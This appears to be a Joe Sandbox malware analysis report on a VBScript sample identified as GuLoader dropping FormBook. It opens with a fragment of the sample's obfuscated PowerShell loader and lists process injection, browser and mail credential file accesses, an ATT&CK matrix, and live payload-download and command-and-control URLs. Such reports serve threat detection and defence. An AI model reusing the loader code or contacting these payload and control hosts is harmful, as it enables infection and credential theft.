 iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dO
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
          Source: C:\Windows\SysWOW64\cmdkey.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: GJFjqeGumqI.exe, 0000000B.00000002.3467460976.0000000001351000.00000002.00000001.00040000.00000000.sdmp, GJFjqeGumqI.exe, 0000000B.00000000.3080810232.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\cmdkey.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality

          Source: Yara match, File source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information321
          Scripting
          Valid Accounts1
          Windows Management Instrumentation
          321
          Scripting
          1
          Abuse Elevation Control Mechanism
          1
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          LSASS Memory114
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter
          Logon Script (Windows)512
          Process Injection
          3
          Obfuscated Files or Information
          Security Account Manager121
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell
          Login HookLogin Hook1
          Software Packing
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput Capture3
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets31
          Virtualization/Sandbox Evasion
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion
          DCSync1
          Remote System Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
          Process Injection
          Proc Filesystem1
          System Network Configuration Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Behavior Graph ID: 1539343  Sample: 6 654398.vbs  Startdate: 22/10/2024  Architecture: WINDOWS  Score: 100
          Domains / IPs at sample level: www.groupriam.com; gormezl_6777.6777.6777.677e; 2 other IPs or domains
          Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 6 other signatures

          Process tree (as drawn in the behavior graph):
            powershell.exe (started)
              signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
              msiexec.exe (started)
                signatures: Maps a DLL or memory area into another process
                GJFjqeGumqI.exe (injected)
                  signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
                  cmdkey.exe (started)
                    signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                    GJFjqeGumqI.exe (injected)
                      network: www.foundation-repair.biz 199.59.243.227, 50003, 80 BODIS-NJUS United States
                      signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    firefox.exe (started)
              conhost.exe (started)
            wscript.exe (started)
              signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
              powershell.exe (started)
                network: groupriam.com 199.103.62.205, 443, 49718, 49988 CIRRUSTECHLTDCA Canada
                signatures: Found suspicious powershell code related to unpacking or dynamic code loading
                conhost.exe (started)
              PING.EXE (started)
                conhost.exe (started)

Source | Detection | Scanner | Label | Link
6 654398.vbs | 18% | ReversingLabs | Script-WScript.Trojan.Guloader |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
groupriam.com | 199.103.62.205 | true | false | | unknown
www.foundation-repair.biz | 199.59.243.227 | true | false | | unknown
gormezl_6777.6777.6777.677e | unknown | unknown | true | | unknown
www.groupriam.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.groupriam.com/zkwqTJp58.bin | false | | unknown
http://www.foundation-repair.biz/enra/?mxv=bBN4&XFtPf6=EuJScojaXV9tkcwLe9A6ZNdie4KkCxAOd2jPPlI8uN15nuMsourZ6RcE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzR3lGN8BbnO4B13xmkasr+DtvmANIh/JvA8i/3xstHKmsaw== | false | | unknown
https://www.groupriam.com/Koalitioner.prx | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.groupriam.com/zkwqTJp58.binT | msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.groupriam.com | powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://duckduckgo.com/ac/?q= | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.groupriam.com/zkwqTJp58.binZ | msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://promenter.rs/Koalitioner.prx | powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.groupriam.com | powershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.groupriam.com/L_y | msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://groupriam.com | powershell.exe, 00000004.00000002.2329009817.0000019E28C6D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.microR | powershell.exe, 00000006.00000002.2657649363.00000000075B0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.groupriam.com/zkwqTJp58.binUnwesJaebruta.pl/zkwqTJp58.binKrlgsBrdpromenter.rs/zkwqTJp58. | msiexec.exe, 0000000A.00000002.3171643157.00000000067E0000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | cmdkey.exe, 0000000C.00000002.3468867917.0000000003FE4000.00000004.10000000.00040000.00000000.sdmp, cmdkey.exe, 0000000C.00000002.3470326587.00000000064E0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.groupriam.com/zkwqTJp58.bin3 | msiexec.exe, 0000000A.00000003.3126476457.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3167761730.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bruta.pl/Koalitioner.prx | powershell.exe, 00000004.00000002.2329009817.0000019E27116000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2329009817.0000019E28408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004D17000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2329009817.0000019E26EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2624423621.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.groupriam.com/$_Q | msiexec.exe, 0000000A.00000002.3167698072.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | cmdkey.exe, 0000000C.00000002.3470610274.0000000008078000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
199.103.62.205 | groupriam.com | Canada | | 36218 | CIRRUSTECHLTDCA | false
199.59.243.227 | www.foundation-repair.biz | United States | | 395082 | BODIS-NJUS | false
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1539343
                                                      Start date and time:2024-10-22 15:30:09 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 11s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:6 654398.vbs
                                                      renamed because original name is a hash value
                                                      Original Sample Name: 654398.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@15/8@3/2
                                                      EGA Information:
                                                      • Successful, ratio: 25%
                                                      HCA Information:
                                                      • Successful, ratio: 84%
                                                      • Number of executed functions: 83
                                                      • Number of non-executed functions: 273
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target GJFjqeGumqI.exe, PID 616 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6656 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7156 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: 6 654398.vbs
Time | Type | Description
09:31:18 | API Interceptor | 79x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
199.103.62.205 | Scanned_22C-6e24090516030.pdf.vbs | malicious | Remcos, GuLoader |
 | ImBm40hNZ2.exe | malicious | FormBook, GuLoader |
 | 02_deb64ed.bin.exe | malicious | GuLoader |
 | Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs | malicious | FormBook, GuLoader |
 | Richiesta di Offerta - Catalogo Campione.vbs | malicious | GuLoader |
 | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | malicious | FormBook, GuLoader |
 | Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs | malicious | FormBook, GuLoader |
 | 47#U0627.vbs | malicious | FormBook, GuLoader |
199.59.243.227 | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | www.9net88.net/ge07/?Qzr=Llspyx1H8n00&anM=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uj/DqErob1VpJkZnQ==
 | zamowienie.exe | malicious | GuLoader | www.gold-rates.online/rod1/
 | PO1268931024 - Bank Slip.exe | malicious | PureLog Stealer | www.rebel.tienda/7n9v/
 | rHSBCBank_Paymentswiftcpy.exe | malicious | FormBook | www.donante-de-ovulos.biz/g3wl/
 | Halkbank_Ekstre_20230426_075819_154055.exe | malicious | FormBook | www.online-dating28.xyz/xl8n/
 | Re property pdf.exe | malicious | FormBook | www.662-home-nb.shop/axh7/
 | #U8a02#U55ae#U63cf#U8ff0.vbs | malicious | FormBook | www.notepad.mobi/4q0m/
 | jOAcln1aPL.exe | malicious | Unknown | hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
 | jOAcln1aPL.exe | malicious | Unknown | hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
 | 890927362736.exe | malicious | DBatLoader, FormBook | www.virtu.industries/i9b0/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.foundation-repair.biz | ImBm40hNZ2.exe | malicious | FormBook, GuLoader | 199.59.243.227
 | Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs | malicious | FormBook, GuLoader | 199.59.243.226
 | SecuriteInfo.com.Script.SNH-gen.5224.29912.exe | malicious | FormBook | 199.59.243.226
 | Paul Meeting Proposal and Schedule.xls | malicious | FormBook | 199.59.243.226
 | Paul Agrotis List.xls | malicious | FormBook | 199.59.243.226
 | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | malicious | FormBook, GuLoader | 199.59.243.226
 | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 199.59.243.226

Match | Associated Sample Name / URL | Detection | Threat Name | Context
BODIS-NJUS | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
 | zamowienie.exe | malicious | GuLoader | 199.59.243.227
 | PO1268931024 - Bank Slip.exe | malicious | PureLog Stealer | 199.59.243.227
 | rHSBCBank_Paymentswiftcpy.exe | malicious | FormBook | 199.59.243.227
 | Halkbank_Ekstre_20230426_075819_154055.exe | malicious | FormBook | 199.59.243.227
 | Re property pdf.exe | malicious | FormBook | 199.59.243.227
 | #U8a02#U55ae#U63cf#U8ff0.vbs | malicious | FormBook | 199.59.243.227
 | Document.html | malicious | HTMLPhisher | 199.59.243.227
 | jOAcln1aPL.exe | malicious | Unknown | 199.59.243.227
 | jOAcln1aPL.exe | malicious | Unknown | 199.59.243.227
CIRRUSTECHLTDCA | Scanned_22C-6e24090516030.pdf.vbs | malicious | Remcos, GuLoader | 199.103.62.205
 | ImBm40hNZ2.exe | malicious | FormBook, GuLoader | 199.103.62.205
 | 02_deb64ed.bin.exe | malicious | GuLoader | 199.103.62.205
 | Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbs | malicious | FormBook, GuLoader | 199.103.62.205
 | Richiesta di Offerta - Catalogo Campione.vbs | malicious | GuLoader | 199.103.62.205
 | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | malicious | FormBook, GuLoader | 199.103.62.205
 | Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs | malicious | FormBook, GuLoader | 199.103.62.205
 | 47#U0627.vbs | malicious | FormBook, GuLoader | 199.103.62.205
 | g5oo6DQ4pd.exe | malicious | Unknown | 208.69.57.105
 | OQchDohurA.exe | malicious | Raccoon SmokeLoader | 192.228.108.27

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Massageapparater.vbs | malicious | FormBook, GuLoader | 199.103.62.205
 | FZCO - PO#12345.exe | malicious | AgentTesla | 199.103.62.205
 | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 199.103.62.205
